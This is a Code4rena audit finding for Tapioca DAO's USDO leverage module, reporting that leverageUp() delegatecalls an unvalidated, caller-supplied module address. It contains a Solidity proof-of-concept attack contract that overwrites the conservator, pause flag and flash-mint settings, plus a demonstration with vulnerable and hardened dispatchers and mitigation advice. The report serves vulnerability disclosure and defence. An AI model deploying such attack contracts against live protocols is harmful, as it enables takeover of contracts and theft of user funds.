Tapioca DAO - ACai's results

The first ever Omnichain money market, powered by LayerZero.

General Information

Platform: Code4rena

Start Date: 05/07/2023

Pot Size: $390,000 USDC

Total HM: 136

Participants: 132

Period: about 1 month

Judge: LSDan

Total Solo HM: 56

Id: 261

League: ETH

Researcher Performance

Rank: 100/132

Findings: 1

Award: $56.17

🌟 Selected for report: 0

🚀 Solo Findings: 0

Findings Information

Labels

bug
3 (High Risk)
satisfactory
duplicate-1083

Awards

56.1709 USDC - $56.17

External Links

Lines of code

https://github.com/Tapioca-DAO/tapioca-bar-audit/blob/master/contracts/usd0/modules/USDOLeverageModule.sol#L133-L188
https://github.com/Tapioca-DAO/tapioca-bar-audit/blob/master/contracts/usd0/BaseUSDOStorage.sol#L22-L35

Vulnerability details

Impact

USDOLeverageModule.leverageUp() does not validate its address module input parameter before delegatecalling into it. An attacker can pass the address of a contract they control as module; because delegatecall executes the callee's code in the caller's storage context, the attacker's code can overwrite the state variables that USDOLeverageModule inherits from BaseUSDOStorage. The affected variables are listed below.

    /// @notice returns the Conservator address
    address public conservator;
    /// @notice addresses allowed to mint USDO
    /// @dev chainId>address>status
    mapping(uint256 => mapping(address => bool)) public allowedMinter;
    /// @notice addresses allowed to burn USDO
    /// @dev chainId>address>status
    mapping(uint256 => mapping(address => bool)) public allowedBurner;
    /// @notice returns the pause state of the contract
    bool public paused;

    /// @notice returns the flash mint fee
    uint256 public flashMintFee;
    /// @notice returns the maximum amount of USDO that can be minted through the EIP-3156 flow
    uint256 public maxFlashMint;

Proof of Concept

The attacker passes the address of the attack contract below as the module parameter. USDOLeverageModule then delegatecalls attack.leverageUpInternal(); since the attack contract declares the same storage layout as BaseUSDOStorage, every assignment in that function writes to the corresponding storage slot of USDOLeverageModule.

// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.18;

// Import paths are assumed. OFTV2 is inherited only so that the storage
// layout below starts at the same slot as BaseUSDOStorage (which also
// inherits OFTV2); the interfaces supply the leverageUpInternal() types.
import "tapioca-sdk/dist/contracts/token/oft/v2/OFTV2.sol";
import "tapioca-periph/contracts/interfaces/IYieldBoxBase.sol";
import "tapioca-periph/contracts/interfaces/IUSDOBase.sol";

contract attack is OFTV2 {
    // Storage declared in the same order as BaseUSDOStorage so that, when
    // USDOLeverageModule delegatecalls into this contract, each write in
    // leverageUpInternal() lands on the caller's corresponding slot.

    /// @notice the YieldBox address.
    IYieldBoxBase public immutable yieldBox;

    /// @notice returns the Conservator address
    address public conservator;
    /// @notice addresses allowed to mint USDO
    /// @dev chainId>address>status
    mapping(uint256 => mapping(address => bool)) public allowedMinter;
    /// @notice addresses allowed to burn USDO
    /// @dev chainId>address>status
    mapping(uint256 => mapping(address => bool)) public allowedBurner;
    /// @notice returns the pause state of the contract
    bool public paused;

    /// @notice returns the flash mint fee
    uint256 public flashMintFee;
    /// @notice returns the maximum amount of USDO that can be minted through the EIP-3156 flow
    uint256 public maxFlashMint;

    // OFTV2 constructor arguments (name, symbol, sharedDecimals, lzEndpoint)
    // follow the LayerZero OFTV2 signature; the values are placeholders.
    constructor(address _lzEndpoint, IYieldBoxBase _yieldBox)
        OFTV2("attack", "ATK", 8, _lzEndpoint)
    {
        yieldBox = _yieldBox;
    }

    // Same selector and parameters as USDOLeverageModule.leverageUpInternal();
    // the arguments are ignored, only the storage writes matter.
    function leverageUpInternal(
        uint256 amount,
        IUSDOBase.ILeverageSwapData memory swapData,
        IUSDOBase.ILeverageExternalContractsData memory externalData,
        IUSDOBase.ILeverageLZData memory lzData,
        address leverageFor
    ) external {
        conservator = address(0); // or any address
        paused = !paused;         // true or false
        flashMintFee = 0;         // or any uint256
        maxFlashMint = 0;         // or any uint256
    }
}

Recommended Mitigation Steps

Restrict the module parameter to a whitelist of known module addresses (the module addresses already registered in the USDO contract) and revert if the supplied address is not one of them, so that no caller-supplied address ever reaches the delegatecall.
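The unchecked-module pattern from the proof of concept beside a hardened dispatcher, as an added illustration that is not Tapioca's code: SharedStorage, VulnerableDispatcher, HardenedDispatcher, EvilModule, Demo and the Module enum are hypothetical names, and the shared storage is reduced to the BaseUSDOStorage fields quoted above. The hardened contract keeps the module addresses in owner-controlled storage and only lets callers select a registered module, so the delegatecall target is never taken from calldata.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.18;

// Added illustration, not Tapioca code. All contract and enum names are
// hypothetical; the storage fields mirror the BaseUSDOStorage excerpt.

/// Storage that the dispatcher and its modules must share slot-for-slot.
abstract contract SharedStorage {
    address public conservator;
    mapping(uint256 => mapping(address => bool)) public allowedMinter;
    mapping(uint256 => mapping(address => bool)) public allowedBurner;
    bool public paused;
    uint256 public flashMintFee;
    uint256 public maxFlashMint;

    /// Re-raises the revert data of a failed delegatecall.
    function _bubble(bytes memory reason) internal pure {
        assembly { revert(add(reason, 32), mload(reason)) }
    }
}

/// Vulnerable pattern: the delegatecall target comes straight from the caller.
contract VulnerableDispatcher is SharedStorage {
    constructor(address initialConservator) {
        conservator = initialConservator;
    }

    function leverageUp(address module, uint256 amount) external {
        // delegatecall runs `module`'s code against THIS contract's storage,
        // so whatever `module` writes overwrites the fields above.
        (bool ok, bytes memory reason) = module.delegatecall(
            abi.encodeWithSignature("leverageUpInternal(uint256)", amount)
        );
        if (!ok) _bubble(reason);
    }
}

/// Hardened pattern: modules are registered by the owner; callers pick an id.
contract HardenedDispatcher is SharedStorage {
    enum Module { Leverage, Market, Options }

    address public immutable owner;
    mapping(Module => address) private modules;

    error NotOwner();
    error NotAContract(address impl);
    error ModuleNotSet(Module id);

    constructor(address initialConservator, address leverageModule) {
        owner = msg.sender;
        conservator = initialConservator;
        _setModule(Module.Leverage, leverageModule);
    }

    function setModule(Module id, address impl) external {
        if (msg.sender != owner) revert NotOwner();
        _setModule(id, impl);
    }

    function _setModule(Module id, address impl) private {
        if (impl.code.length == 0) revert NotAContract(impl);
        modules[id] = impl;
    }

    /// The caller cannot supply an address, only trigger a registered module.
    function leverageUp(uint256 amount) external {
        address module = modules[Module.Leverage];
        if (module == address(0)) revert ModuleNotSet(Module.Leverage);
        (bool ok, bytes memory reason) = module.delegatecall(
            abi.encodeWithSignature("leverageUpInternal(uint256)", amount)
        );
        if (!ok) _bubble(reason);
    }
}

/// Attacker-controlled "module": same layout, so its writes hit the caller's slots.
contract EvilModule is SharedStorage {
    function leverageUpInternal(uint256) external {
        conservator = msg.sender;        // msg.sender is preserved by delegatecall
        paused = true;
        maxFlashMint = type(uint256).max;
    }
}

/// Drives the attack against the vulnerable dispatcher. The hardened one has
/// no entry point that accepts an address, so the same call cannot be made.
contract Demo {
    function run() external returns (address newConservator, bool nowPaused) {
        VulnerableDispatcher target = new VulnerableDispatcher(address(0xBEEF));
        EvilModule evil = new EvilModule();
        target.leverageUp(address(evil), 1);
        return (target.conservator(), target.paused());
    }
}
```

Deploying Demo and calling run() returns the Demo contract's own address as the new conservator and true for paused, confirming that EvilModule's writes landed on VulnerableDispatcher's storage rather than its own. HardenedDispatcher still uses delegatecall internally, which is the point: the fix is not to avoid delegatecall but to make sure only addresses set through the owner-gated setModule() can ever be its target.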

Assessed type

call/delegatecall

#0 - c4-pre-sort

2023-08-07T08:45:20Z

minhquanym marked the issue as duplicate of #146

#1 - c4-judge

2023-09-13T10:25:14Z

dmvt marked the issue as satisfactory
